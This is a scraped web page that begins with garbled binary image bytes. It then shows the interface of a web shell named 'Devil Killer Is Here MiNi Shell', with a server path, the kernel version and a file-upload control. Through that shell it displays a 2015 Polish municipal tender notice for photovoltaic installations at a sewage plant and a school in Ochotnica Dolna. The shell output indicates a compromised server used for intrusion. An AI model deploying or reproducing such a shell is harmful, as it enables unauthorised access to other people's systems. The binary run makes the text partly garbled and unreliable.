JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150603/81869-N-2015.html

<p class="kh_header"><b>Ochotnica Dolna: Odnawialne źródła energii szansą poprawy stanu środowiska naturalnego w Gminie Ochotnica Dolna</b><br>
<b>Numer ogłoszenia: 81869 - 2015; data zamieszczenia: 03.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ochotnica Dolna , Osiedle Dłubacze 160, 34-452 Ochotnica Dolna, woj. małopolskie, tel. 18 262 09 10, faks 18 262 09 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ochotnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnawialne źródła energii szansą poprawy stanu środowiska naturalnego w Gminie Ochotnica Dolna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje kompleksowe wybudowanie dwóch systemów paneli fotowoltaicznych wytwarzających energię elektryczna na potrzeby dwóch obiektów:
-Oczyszczalni ścieków w Tylmanowej o mocy znamionowej nie mniejszej niż 198,94 kWp
-Zespołu Szkolno-Przedszkolnego w Tylmanowej o mocy znamionowej nie mniejszej niż 22,54 kWp

Instalacje fotowoltaiczne należy wykonać zgodnie z: 
-Wymaganiami niniejszej Specyfikacji Istotnych Warunków Zamówienia (wraz z załącznikami szczególnie załącznikiem nr 1 - charakterystyka techniczną). 
-przedmiarem robót, 

Zamawiający informuje, że na powyższy zakres robót posiada decyzję o pozwoleniu na budowę jednakże dopuszcza możliwość wykonania przedmiotu zamówienia w inny niż określony w decyzji sposób pod warunkiem uzyskania przez Wykonawcę robót stosownych uzgodnień, zmian decyzji i dokumentów.  
Zmiana taka musi być zatwierdzona przez Zamawiającego i musi spełniać wszystkie wymogi określone w zał. nr 1 do niniejszej SIWZ - charakterystyce technicznej.  

Do obowiązków Wykonawcy należy: 
1)wykonanie robót budowlanych: prac ziemnych, montażowych, instalacyjnych i ogólnobudowlanych, 
2)opracowanie planu bezpieczeństwa i ochrony zdrowia (BIOZ) oraz harmonogramu robót budowlanych i przedłożenie tych opracowań do weryfikacji Zamawiającemu i Inspektorowi nadzoru budowlanego, 
3)złożenie właściwym miejscowo organom administracyjnym: wniosku o wydanie dziennika budowy oraz zawiadomienie o zamierzonym terminie rozpoczęcia budowy, 
4)przechowywanie na terenie budowy dziennika budowy, dokonywanie wpisów do dziennika budowy przez osoby uprawnione i zobowiązane prawem do dokonywania wpisów, 
5)protokolarne przejęcie od Zamawiającego, terenu budowy przy udziale Inspektora nadzoru inwestorskiego, 
6)umieszczenie na terenie budowy, w widocznym miejscu, tablicy informacyjnej i ogłoszenia zawierającego dane dotyczące bezpieczeństwa pracy i ochrony zdrowia oraz odpowiednie zabezpieczenie terenu budowy, 
7)kompleksowa obsługa geodezyjna celem właściwego umiejscowienia konstrukcji wsporczych i ogrodzenia elektrowni, 
8)uprzątnięcie i uporządkowanie terenu po wykonanych pracach budowlanych, dosianie trawy w miejscach ogołoconych z roślinności, 
9)w przypadku konieczności zmiany projektu budowlanego: 
a.sporządzenie protokołu konieczności i uzyskanie zgody Zamawiającego, Inspektora nadzoru budowlanego, Projektanta i Instytucji udzielającej dofinansowania (w przypadku konieczności wniesienia zmian do wniosku o dofinansowanie), 
b.opracowanie dokumentacji zamiennej, a w przypadku wystąpienia istotnych zmian projektowych, dodatkowo, wystąpienie do organu administracyjnego o wydanie decyzji zmieniającej istniejące pozwolenie na budowę, 
10)bieżące dostarczanie do weryfikacji Inspektora nadzoru inwestorskiego oraz Zamawiającego atestów wbudowywanych materiałów budowlanych, deklaracji zgodności, aprobat, DTR i innych dokumentów pozwalających na ocenę właściwości i parametrów elementów składowych elektrowni, 
11)zgłaszanie Zamawiającemu i Inspektorowi nadzoru gotowości do odbioru: 
a.robót zanikowych i ulegających zakryciu, 
b.robót częściowych - zgodnie z harmonogramem rzeczowo-finansowym, 
c.zakończonych wszystkich robót budowlanych, 
12)protokolarne odbiory przez Zamawiającego wykonanych robót budowlanych zgodnie z harmonogramem rzeczowo-finansowym, przy udziale Inspektora nadzoru inwestorskiego, 
13)protokolarny odbiór zakończonych robót budowlanych 
14)dokonanie przez Wykonawcę wszelkich prób, sprawdzeń, pomiarów, badań, ekspertyz, regulacji pozwalających na eksploatację elektrowni
15)dokonanie rozruchu elektrowni 
16)przyłączenie elektrowni do sieci elektroenergetycznej 
17)opracowanie niezbędnych instrukcji: 
a.instrukcji ruchu i eksploatacji urządzeń, instalacji i sieci oraz współpracy elektrowni z siecią operatora 
b.instrukcji obsługi elektrowni na potrzeby Zamawiającego oraz przeszkolenie w zakresie bieżącej obsługi osób rekomendowanych przez Zamawiającego 
18)Uzyskanie pozwolenia na użytkowanie elektrowni: 
a.w przypadku nieistotnych zmian projektowych naniesienie na duplikacie projektu budowlanego dokonanych zmian, zatwierdzenie zmian przez Projektanta i przedłożenie Zamawiającemu - 3 egzemplarze w wersji papierowej i 1 egz. w wersji elektronicznej, 
b.wykonanie geodezyjnego pomiaru i dokumentacji powykonawczej, 
c.zgłoszenie zrealizowanej inwestycji odpowiednim służbom, instytucjom i organom administracyjnym, wg wskazań decyzji zezwalającej na budowę i uzyskanie pozwolenia na użytkowanie elektrowni 
19)Protokolarny odbiór wykonania przedmiotu zamówienia 

Wykonawca przedmiotu zamówienia zobowiązany jest do: 
1)prowadzenia robót pod stałym nadzorem technicznym, z zachowaniem obowiązujących przepisów, w tym: bhp i przeciwpożarowych oraz zgodnie z poleceniami inspektora nadzoru, 
2)zapewnienie kierownika budowy, posiadającego uprawnienia budowlane bez ograniczeń w specjalności: konstrukcyjno - budowlanej, 
3)zapewnienia kierownika robót posiadającego uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. 
4)przedłożenia przed podpisaniem umowy Harmonogramu rzeczowo- finansowego robót budowlanych, 
5)umożliwienia w każdym czasie przeprowadzenia kontroli miejsca realizacji robót budowlanych oraz zastosowanych materiałów, 
6)uczestniczenia w kontrolach przeprowadzanych przez PINB i inne jednostki administracji uprawnione do kontroli, wykonania zaleceń, ustaleń, postanowień i decyzji, wydanych podczas tych kontroli, 
7)wykonania oraz pokrycia kosztów związanych z odbiorami technicznymi, w tym: niezbędnych prób, sprawdzeń, odbiorów zezwalających na eksploatację (Urząd Dozoru Technicznego, zakład energetyczny itp.), regulacji instalacji, przygotowania dokumentacji odbiorowej, wymaganej do uzyskania decyzji organu- pozwolenia na użytkowanie, 
8)dostarczenia dla instalowanych i montowanych urządzeń, kompletu: osprzętu, oznakowań, instrukcji obsługi i konserwacji, środków ochrony indywidualnej i zbiorowej z zakresu bhp oraz ochrony przeciwpożarowej, wymaganych przepisami szczegółowymi, 
9)udzielania instruktażu w zakresie obsługi elektrowni pracownikom wskazanym przez Zamawiającego (także w okresie trwania gwarancji przedmiotu umowy), 
10)zlecenia i pokrycia kosztów opracowania dokumentacji zamiennej (w przypadku wystąpienia istotnych zmian od zatwierdzonego projektu budowlanego), 
11)zorganizowania zaplecza robót oraz utrzymania porządku i ochrony mienia znajdującego się na terenie budowy lub terenach przyległych. Wykonawca zobowiązany jest utrzymać teren budowy w stanie wolnym od przeszkód komunikacyjnych, usuwać na bieżąco zbędne materiały, odpady i śmieci oraz ponieść koszty z tym związane, 
12)zabezpieczenia terenu budowy z zachowaniem najwyższej staranności, 
13)zabezpieczenia składowanych tymczasowo na placu budowy materiałów przed zniszczeniem, uszkodzeniem lub utratą: jakości, właściwości i parametrów,
14)przedkładania Inspektorowi nadzoru inwestorskiego do akceptacji: 
a.dokumentów pozwalających na ocenę prawidłowego wykonania robót oraz stanowiących przedmiot odbioru, a w szczególności: dziennik budowy, zaświadczenia właściwych jednostek i organów, protokoły techniczne odbiorów, niezbędne świadectwa kontroli jakości oraz dokumentację powykonawczą ze wszystkimi zmianami dokonanymi w toku budowy, 
b.zmian Harmonogramu rzeczowo- finansowego robót budowlanych,
c.faktur za wykonane roboty,
d.wszelkich zmian w zatwierdzonym decyzją administracyjną projekcie budowlanym, ewentualnych odstępstw od projektu budowlanego, opracowanych projektów zamiennych i dokumentacji powykonawczej, 
e.planu BIOZ, protokołów konieczności, protokołów różnicowych, kompletnej dokumentacji odbiorowej, 
15)zawiadomienia Inspektora nadzoru inwestorskiego o zamiarze rozpoczęcia oraz zakończeniu wykonania robót zanikających lub ulegających zakryciu. 
16)dotrzymywania warunków gwarancji, wykonywania napraw gwarancyjnych, o których mowa w § 11 umowy, zgodnie z wzorem karty gwarancyjnej, 
17) dokonywania w okresie gwarancyjnym na koszt Wykonawcy i w uzgodnieniu z użytkownikami wybudowanych instalacji wszelkich wymaganych przeglądów technicznych, pomiarów, badań i analiz urządzeń, instalacji i budowli zrealizowanych w ramach przedmiotowego zamówienia.

Wymagania dotyczące przedmiotu zamówienia: 
1)Wykonawca odpowiedzialny jest za całokształt, w tym: za przebieg i terminowe wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi i jakościowymi- określonymi dla przedmiotu zamówienia, spełnienie innych wymagań wynikających z obowiązujących przepisów prawa. Wykonawca ponosi pełną odpowiedzialność za realizację robót, a w przypadku wykonania ich niezgodnie z ustawą Prawo budowlane lub uszkodzeniem obiektu- jest zobowiązany do przywrócenia stanu pierwotnego i usunięcia powstałych usterek na własny koszt, 
2)W przypadku stwierdzenia, że roboty wykonywane są niezgodnie z obowiązującymi przepisami Zamawiający może odstąpić od zapłaty i zażądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy, 
3)Przy wykonywaniu robót budowlanych należy stosować wyroby, które zostały dopuszczone do obrotu oraz powszechnego lub jednostkowego stosowania w budownictwie zgodnie z przepisami ustawy z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz.U.2004, Nr 92 poz.881 z póżn.zm), oznakowane symbolem CE, umieszczone w określonym przez Komisję Europejską wykazie materiałów budowlanych, dla których producent wydał deklarację zgodności z Polskimi Normami, które uzyskały aprobatę techniczną oraz europejskimi aprobatami technicznymi Wszystkie niezbędne elementy powinny być wykonane zgodnie z obowiązującymi normami i przepisami prawa budowlanego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67, ust.1, pkt. 6 - ustawy z dnia 29 stycznia 2004 roku Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.32.00.00-4, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.23.30.00-6, 45.31.53.00-1, 45.31.12.00-2, 09.33.20.00-5, 09.33.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 16.	Zgodnie z dyspozycją art. 45 ust 2. Pzp Zamawiający wymaga wniesienia wadium w wysokości 30.000 zł. Wadium może być wnoszone w formach określonych w art. 45 ust 6. Pzp. W przypadku wnoszenia wadium w formie pieniądza należy je wpłacić przelewem do dnia 18 czerwca 2015 r. do godz. 8,45 (decyduje data wpływu środków na konto, a nie data ich nadania) na konto Zamawiającego Łąckim Banku Spółdzielczym nr 77 8805 0009 0000 2206 2003 0028.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożenia: 
-Kserokopia aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w przypadku osób fizycznych prowadzących działalność  gospodarczą Wykonawca może dołączyć do oferty aktualny wydruk z CEIDG prowadzonej przez  Ministerstwo Gospodarki. W przypadku Oferenta będącego Spółką Cywilną obowiązuje załączenie umowy spółki., 
-oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu,
-oświadczenie Wykonawcy  o  braku  podstaw wykluczenia na podstawie  art. 24 ust. 1 Pzp, 
-oświadczenie   Wykonawcy   dotyczące  uprawnień, 
Wg zasady: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożenia: 
-wykazu tożsamych robót wykonywanych w okresie ostatnich 5 lat.
Wymagane jest wykazanie wykonania co najmniej 1 instalacji montowanej na gruncie oraz co najmniej 2 instalacji współpracujących z bankiem akumulatorów o pojemności banku akumulatorów min. 10kWh każda. 
Wykonawca spełnia wymogi w zakresie posiadania stosownego doświadczenia, jeżeli przedstawi dokumenty potwierdzający wykonanie min. 1 elektrowni fotowoltaicznej naziemnej o wartości co najmniej 500 000 zł oraz co najmniej 2 instalacji współpracujących z bankiem akumulatorów o pojemności banku akumulatorów min. 10kWh każdy.
-wykazu poświadczeń, referencji lub innych dokumentów potwierdzających prawidłowe wykonanie robót budowlanych określonych powyżej.
-oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu
-W przypadku gdy Wykonawca będzie polegał na wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania  zamówienia  lub zdolnościach finansowych innych podmiotów, niezależnie  od charakteru prawnego łączących go z nimi stosunków na podstawie  art. 26 ust. 2b, oprócz  zobowiązania, o  którym mowa w art. 26 ust. 2b, Wykonawca  zobowiązany jest  do przedłożenia  dokumentów dotyczących: 
a) zakresu dostępnych wykonawcy zasobów innego podmiotu;
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia,
c)  charakteru, stosunku, jaki będzie  łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy  wykonywaniu zamówienia
oraz oświadczenia i dokumenty określone  w punkcie 7.2 i 7.11.1 i 7.11.2  SIWZ w odniesieniu do tych podmiotów.
Wg zasady: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożenia: 
- oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu. 
Wg zasady: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożenia: 
- oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu
- Wykaz osób którymi dysponuje lub będzie  dysponował Wykonawca i które będą  uczestniczyć  w  wykonaniu zamówienia. 
Wg zasady: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie przedłożenia:
- oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu. 
Wg zasady: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- inne dokumenty: poświadczenia, referencje i inne dokumenty z których wynika, że Wykonawca wykonał roboty budowlane wykazane w ofercie należycie</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty określone w p. 7 siwz - m.in.:
- formularz ofertowy,
- w przypadku Oferentów wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, w sprawie niniejszego zamówienia publicznego, 
- dokument potwierdzający wniesienie wadium.

Dla potwierdzenia spełniania wymogów siwz należy przedłożyć:
- Opis techniczno-technologiczny wykonania inwestycji wraz z podaniem modeli i typów urządzeń przewidzianych do zainstalowania w ramach przedmiotowego zamówienia,
- Kosztorys ofertowy sporządzony na podstawie przedmiaru robót stanowiącego załącznik do SIWZ. 

Po wyborze oferty najkorzystniejszej, a przed podpisaniem umowy Zamawiający będzie żądał od Wykonawcy, którego oferta będzie najkorzystniejsza, przedłożenia: 
- kserokopii uprawnień zawodowych kierownika budowy w specjalności konstrukcyjno-budowlanej i kierownika robót w specjalności elektrycznej , poświadczone za zgodność z oryginałem przez Oferenta,
- kserokopii zaświadczeń właściwego oddziału Izby Inżynierów Budownictwa potwierdzająca przynależność kierownika budowy i kierownika robót do Izby na dzień składania ofert, poświadczone za zgodność z  oryginałem przez Oferenta.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji i rękojmi - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące zmiany w zawartej umowie:
a) zmiany wynikające ze zmian w przepisach prawa powszechnie obowiązującego, nieznanych zamawiającemu przed zawarciem umowy,
b) zmiany wynikające z dodatkowych wymagań dla inwestycji współfinansowanych z funduszy Unii Europejskiej, nieznanych zamawiającemu przed zawarciem umowy,
c) zmiany wynikające z wprowadzenia zmian dotyczących dofinansowania i rozliczenia zadań współfinansowanych przez fundusze Unii Europejskiej, a także zmiany wprowadzone przez inne (w tym krajowe) instytucje dofinansowujące,
d) zmiany osób uprawnionych do kierowania robotami budowlanymi oraz sprawujących nadzór inwestorski.
W żadnym przypadku termin wykonania zamówienia nie ulega zmianie</p>
